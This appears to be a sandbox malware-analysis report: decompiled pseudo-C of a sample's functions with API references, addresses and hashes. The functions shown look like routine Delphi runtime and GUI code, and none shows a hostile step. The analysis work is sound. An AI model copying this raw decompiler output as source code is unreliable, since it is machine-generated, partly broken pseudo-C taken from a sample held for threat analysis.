                                  0x00405e24
                                  0x00405e24
                                  0x00405e2e
                                  0x00405e32
                                  0x00405e39
                                  0x00405e39
                                  0x00405e32
                                  0x00405e4f
                                  0x00405e54
                                  0x00405e59
                                  0x00405e5e

                                  APIs
                                    • Part of subcall function 004031E0: GetKeyboardType.USER32(00000000), ref: 004031E5
                                    • Part of subcall function 004031E0: GetKeyboardType.USER32(00000001), ref: 004031F1
                                  • GetCommandLineA.KERNEL32 ref: 00405DFF
                                  • GetVersion.KERNEL32 ref: 00405E13
                                  • GetVersion.KERNEL32 ref: 00405E24
                                  • GetThreadLocale.KERNEL32 ref: 00405E34
                                  • GetThreadLocale.KERNEL32 ref: 00405E40
                                    • Part of subcall function 00405CD0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  • GetACP.KERNEL32 ref: 00405E4A
                                  • GetCurrentThreadId.KERNEL32 ref: 00405E54
                                    • Part of subcall function 00403210: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403232
                                    • Part of subcall function 00403210: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403265
                                    • Part of subcall function 00403210: RegCloseKey.ADVAPI32(?,00403288,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040327B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LocaleThread$KeyboardTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID: 05`
                                  • API String ID: 3238385485-883531628
                                  • Opcode ID: 15291bd8ff136a1fa5aa7d102e8022207f8918c4615f7f3f5a8b86ad117b14ae
                                  • Instruction ID: 54f323300690bf0135cd5641502173b618e665e6d092991e8fe108ec1946a72a
                                  • Opcode Fuzzy Hash: 15291bd8ff136a1fa5aa7d102e8022207f8918c4615f7f3f5a8b86ad117b14ae
                                  • Instruction Fuzzy Hash: 9701EDB4446781C5E750FFB6A44A3497A60BB01318F10547FD548BA2F2EB3C4184DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004347A8, Relevance: 13.6, APIs: 9, Instructions: 140COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004347A8(intOrPtr* __eax, int __ecx, int __edx) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				signed int _t70;
				signed int _t74;
				signed int _t75;
				int _t76;
				int _t116;
				intOrPtr* _t117;
				int _t118;

				_t118 = __ecx;
				_t116 = __edx;
				_t117 = __eax;
				if(__ecx == __edx) {
					L29:
					_t70 =  *0x434950 & 0x000000ff;
					 *(_t117 + 0x98) = _t70;
					return _t70;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_v20 =  *0x434948 & 0x000000ff;
				} else {
					_v20 =  *(__eax + 0x98) & 0x000000ff;
				}
				if((_v20 & 0x00000001) == 0) {
					_v32 =  *(_t117 + 0x40);
				} else {
					_v32 = MulDiv( *(_t117 + 0x40), _t116, _t118);
				}
				if((_v20 & 0x00000002) == 0) {
					_v28 =  *(_t117 + 0x44);
				} else {
					_v28 = MulDiv( *(_t117 + 0x44), _t116, _t118);
				}
				if((_v20 & 0x00000004) == 0 || ( *(_t117 + 0x51) & 0x00000001) != 0) {
					_t74 =  *(_t117 + 0x48);
					_v24 = _t74;
				} else {
					if((_v20 & 0x00000001) == 0) {
						_t74 = MulDiv( *(_t117 + 0x48), _t116, _t118);
						_v24 = _t74;
					} else {
						_t74 = MulDiv( *(_t117 + 0x40) +  *(_t117 + 0x48), _t116, _t118) - _v32;
						_v24 = _t74;
					}
				}
				_t75 = _t74 & 0xffffff00 | (_v20 & 0x00000008) != 0x00000000;
				if(_t75 == 0 || ( *(_t117 + 0x51) & 0x00000002) != 0) {
					_t76 =  *(_t117 + 0x4c);
				} else {
					if(_t75 == 0) {
						_t76 = MulDiv( *(_t117 + 0x44), _t116, _t118);
					} else {
						_t76 = MulDiv( *(_t117 + 0x44) +  *(_t117 + 0x4c), _t116, _t118) - _v28;
					}
				}
				 *((intOrPtr*)( *_t117 + 0x88))(_t76, _v24);
				if(( *0x434950 & 0x000000ff) != (_v28 & 0x000000ff &  *0x43494c)) {
					 *(_t117 + 0x90) = MulDiv( *(_t117 + 0x90), _t116, _t118);
				}
				if(( *0x434950 & 0x000000ff) != (_v28 & 0x000000ff &  *0x434954)) {
					 *(_t117 + 0x94) = MulDiv( *(_t117 + 0x94), _t116, _t118);
				}
				if( *((char*)(_t117 + 0x59)) == 0 && (_v28 & 0x00000010) != 0) {
					E0041D91C( *((intOrPtr*)(_t117 + 0x68)), MulDiv(E0041D900( *((intOrPtr*)(_t117 + 0x68))), _t116, _t118));
				}
				goto L29;
			}














                                  0x004347af
                                  0x004347b1
                                  0x004347b3
                                  0x004347b7
                                  0x00434930
                                  0x00434930
                                  0x00434937
                                  0x00434944
                                  0x00434944
                                  0x004347c1
                                  0x004347d7
                                  0x004347c3
                                  0x004347ca
                                  0x004347ca
                                  0x004347e0
                                  0x004347f5
                                  0x004347e2
                                  0x004347ed
                                  0x004347ed
                                  0x004347fd
                                  0x00434813
                                  0x004347ff
                                  0x0043480a
                                  0x0043480a
                                  0x0043481c
                                  0x00434853
                                  0x00434856
                                  0x00434824
                                  0x00434829
                                  0x00434848
                                  0x0043484d
                                  0x0043482b
                                  0x00434839
                                  0x0043483c
                                  0x0043483c
                                  0x00434829
                                  0x0043485f
                                  0x00434864
                                  0x00434899
                                  0x0043486c
                                  0x00434876
                                  0x00434892
                                  0x00434878
                                  0x00434886
                                  0x00434886
                                  0x00434876
                                  0x004348ae
                                  0x004348c8
                                  0x004348d8
                                  0x004348d8
                                  0x004348f2
                                  0x00434902
                                  0x00434902
                                  0x0043490c
                                  0x0043492b
                                  0x0043492b
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56931724dcda79bfd0f7aaa59a5e01eca36d7d9782fb091460afa16a3d026c34
                                  • Instruction ID: 1fc98fae844862559d15c66ebb5674b268fcf622485d520ad882a022b5c2aba5
                                  • Opcode Fuzzy Hash: 56931724dcda79bfd0f7aaa59a5e01eca36d7d9782fb091460afa16a3d026c34
                                  • Instruction Fuzzy Hash: 225186740087946EC311EB7AC444BA7BFE89F8A318F058C5EB5D583392C679F854CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004356EC, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E004356EC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L004066EC();
				_v16 = _t33;
				_push(_t92);
				_push(0x435807);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041DEAC( *((intOrPtr*)(_t88 + 0x48))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x43580e);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00406944();
				return _t72;
			}





















                                  0x004356ed
                                  0x004356ef
                                  0x004356f5
                                  0x00435701
                                  0x00435707
                                  0x00435717
                                  0x0043571e
                                  0x0043571f
                                  0x00435720
                                  0x00435721
                                  0x00435722
                                  0x00435709
                                  0x00435709
                                  0x00435710
                                  0x00435711
                                  0x00435712
                                  0x00435713
                                  0x00435714
                                  0x00435714
                                  0x00435728
                                  0x0043572b
                                  0x00435730
                                  0x00435732
                                  0x00435735
                                  0x00435736
                                  0x0043573b
                                  0x00435740
                                  0x00435741
                                  0x00435746
                                  0x00435749
                                  0x0043575e
                                  0x0043576a
                                  0x00435772
                                  0x0043577f
                                  0x004357a1
                                  0x004357c0
                                  0x004357da
                                  0x004357e7
                                  0x004357ee
                                  0x004357f1
                                  0x004357f4
                                  0x004357fc
                                  0x004357fd
                                  0x00435800
                                  0x00435801
                                  0x00435806

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00435723
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 00435736
                                  • SelectObject.GDI32(?,00000000), ref: 00435759
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043577F
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004357A1
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004357C0
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004357DA
                                  • SelectObject.GDI32(?,?), ref: 004357E7
                                  • 72E7B380.USER32(?,?,0043580E,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00435801
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: 7137ccb6e6b6f62579c3824a55f0694aa0326d658da7c6cc908ac4b921500ed8
                                  • Instruction ID: f693f7ae5b565339ae0f3290a747a3312923528edfbd380095b06e5f322145e6
                                  • Opcode Fuzzy Hash: 7137ccb6e6b6f62579c3824a55f0694aa0326d658da7c6cc908ac4b921500ed8
                                  • Instruction Fuzzy Hash: E331E7B6E00619BFDB00DEADCC85DAFBBBCAF49714B014469B514F7241C679AD048B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ECE0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E0040ECE0(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040E90C(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040D6BC();
					return E0040E90C(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040DB14();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040E664(_t100);
						}
						E0040EC38(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040EC54(_v788 - 1, _t115) != 0) {
								L0040DB2C();
								E0040E90C(_v792);
								L0040DB2C();
								E0040E90C( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040EC84(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040DB1C();
							E0040E90C(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040DB24();
							E0040E90C(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                  0x0040ece0
                                  0x0040ecec
                                  0x0040ecf2
                                  0x0040ecf4
                                  0x0040ecfe
                                  0x0040ed05
                                  0x0040ed05
                                  0x0040ed0a
                                  0x0040ed18
                                  0x0040ee91
                                  0x0040ee98
                                  0x0040ee99
                                  0x00000000
                                  0x0040ed1e
                                  0x0040ed21
                                  0x0040ed33
                                  0x0040ed23
                                  0x0040ed28
                                  0x0040ed28
                                  0x0040ed42
                                  0x0040ed4e
                                  0x0040ed51
                                  0x0040edbe
                                  0x0040edc4
                                  0x0040edc5
                                  0x0040edcb
                                  0x0040edcc
                                  0x0040edce
                                  0x0040edd3
                                  0x0040edd7
                                  0x0040edd9
                                  0x0040edd9
                                  0x0040ede4
                                  0x0040edef
                                  0x0040edfa
                                  0x0040ee03
                                  0x0040ee06
                                  0x0040ee22
                                  0x0040ee29
                                  0x0040ee34
                                  0x0040ee4b
                                  0x0040ee50
                                  0x0040ee64
                                  0x0040ee69
                                  0x0040ee7c
                                  0x0040ee7c
                                  0x0040ee85
                                  0x0040ee08
                                  0x0040ee08
                                  0x0040ee09
                                  0x0040ee0f
                                  0x0040ee15
                                  0x0040ee17
                                  0x0040ee19
                                  0x0040ee1c
                                  0x0040ee1f
                                  0x0040ee1f
                                  0x0040ee22
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ee22
                                  0x0040ed53
                                  0x0040ed53
                                  0x0040ed54
                                  0x0040ed56
                                  0x0040ed5c
                                  0x0040ed5e
                                  0x0040ed6d
                                  0x0040ed6e
                                  0x0040ed78
                                  0x0040ed79
                                  0x0040ed7e
                                  0x0040ed89
                                  0x0040ed8a
                                  0x0040ed94
                                  0x0040ed95
                                  0x0040ed9a
                                  0x0040edb5
                                  0x0040edb7
                                  0x0040edb8
                                  0x0040edbb
                                  0x0040edbb
                                  0x00000000
                                  0x0040ed5c
                                  0x0040ed51

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040ED79
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040ED95
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040EDCE
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EE4B
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040EE64
                                  • VariantCopy.OLEAUT32(?), ref: 0040EE99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: 669d459abd602cc05d154e15c16596846c75436064cf725d98525ad0c6030072
                                  • Instruction ID: 746a03922ea78402e18e7f841221551199bbce028f608486c49ce08cd7d96be1
                                  • Opcode Fuzzy Hash: 669d459abd602cc05d154e15c16596846c75436064cf725d98525ad0c6030072
                                  • Instruction Fuzzy Hash: 6F510D7590022D9BCB61DB5AC881BD9B3BCAF4C304F4045EAE508F7252D638AF958F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004211AC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E004211AC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00421048(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E0041FA3C( &_v38) != _v18) {
					E0041EBCC();
				}
				_v12 = _v12 - 0x16;
				_v16 = E004026E4(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42131b, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24 & 0x0000ffff;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E0041EBCC();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E0041EBCC();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x421322);
				return E00402704(_v16);
			}


























                                  0x004211ad
                                  0x004211af
                                  0x004211b8
                                  0x004211bb
                                  0x004211be
                                  0x004211c2
                                  0x004211d4
                                  0x004211de
                                  0x004211ee
                                  0x004211ee
                                  0x004211f3
                                  0x004211ff
                                  0x00421202
                                  0x00421210
                                  0x0042121e
                                  0x00421228
                                  0x00421231
                                  0x00421233
                                  0x00421233
                                  0x00421253
                                  0x00421270
                                  0x00421273
                                  0x0042127c
                                  0x00421281
                                  0x00421286
                                  0x0042129c
                                  0x0042129e
                                  0x004212a3
                                  0x004212a5
                                  0x004212a5
                                  0x004212b7
                                  0x004212bc
                                  0x004212c6
                                  0x004212cc
                                  0x004212d1
                                  0x004212d8
                                  0x004212f0
                                  0x004212f2
                                  0x004212f7
                                  0x004212f9
                                  0x004212f9
                                  0x004212fe
                                  0x00421304
                                  0x00421307
                                  0x0042130a
                                  0x0042131a

                                  APIs
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042124E
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042126B
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00421297
                                  • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004212B7
                                  • DeleteEnhMetaFile.GDI32(00000016), ref: 004212D8
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004212EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileMeta$Bits$DeleteHeader
                                  • String ID: `
                                  • API String ID: 1990453761-2679148245
                                  • Opcode ID: cb062cd4891fbcb137a75973799cd9d647f3313e77a495df328eb17fd730aaa3
                                  • Instruction ID: 3f46e23d36fc50193aef999eb47405748200aa2edc5945a1fbc22915a1868693
                                  • Opcode Fuzzy Hash: cb062cd4891fbcb137a75973799cd9d647f3313e77a495df328eb17fd730aaa3
                                  • Instruction Fuzzy Hash: A6411B75A00218EFDB00DFA9D885AAEB7F9EF48710F51846AF904F7251E7399D40CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425588, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00425588(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x470930 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0040632C();
						}
						_t24 = 1;
					}
				} else {
					 *0x470914 = E0042525C(4, _t23,  *0x470914, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                  0x00425591
                                  0x00425594
                                  0x0042559e
                                  0x004255c3
                                  0x004255cb
                                  0x004255eb
                                  0x004255f0
                                  0x004255fb
                                  0x00425606
                                  0x00425610
                                  0x00425611
                                  0x00425612
                                  0x00425613
                                  0x00425614
                                  0x00425615
                                  0x0042561f
                                  0x00425621
                                  0x00425629
                                  0x0042562a
                                  0x0042562a
                                  0x0042562f
                                  0x0042562f
                                  0x004255a0
                                  0x004255b2
                                  0x004255bf
                                  0x004255bf
                                  0x00425639

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 004255B9
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004255E0
                                  • GetSystemMetrics.USER32 ref: 004255F5
                                  • GetSystemMetrics.USER32 ref: 00425600
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042562A
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: 5b6dd8dcad5299ba622ed3271e060dc4bbf34aaf4f643ccc913a623c0b54b73d
                                  • Instruction ID: edb674aab8ac305ead081728a3e1ddce560f0fb8423e560594da60aa40b72e09
                                  • Opcode Fuzzy Hash: 5b6dd8dcad5299ba622ed3271e060dc4bbf34aaf4f643ccc913a623c0b54b73d
                                  • Instruction Fuzzy Hash: FD11E7B1702714AFE720CF60AC4476BB7E4EB45710F80053AED4DD7241D3B4A8408BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042565C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E0042565C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x470931 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0040632C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x470918; // 0x42565c
					 *0x470918 = E0042525C(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x470918(_t27, _t29);
				}
				return _t24;
			}














                                  0x00425665
                                  0x00425668
                                  0x00425672
                                  0x00425697
                                  0x0042569f
                                  0x004256bf
                                  0x004256c4
                                  0x004256cf
                                  0x004256da
                                  0x004256e4
                                  0x004256e5
                                  0x004256e6
                                  0x004256e7
                                  0x004256e8
                                  0x004256e9
                                  0x004256f3
                                  0x004256f5
                                  0x004256fd
                                  0x004256fe
                                  0x004256fe
                                  0x00425703
                                  0x00425703
                                  0x00425674
                                  0x00425679
                                  0x00425686
                                  0x00425693
                                  0x00425693
                                  0x0042570d

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004256B4
                                  • GetSystemMetrics.USER32 ref: 004256C9
                                  • GetSystemMetrics.USER32 ref: 004256D4
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004256FE
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
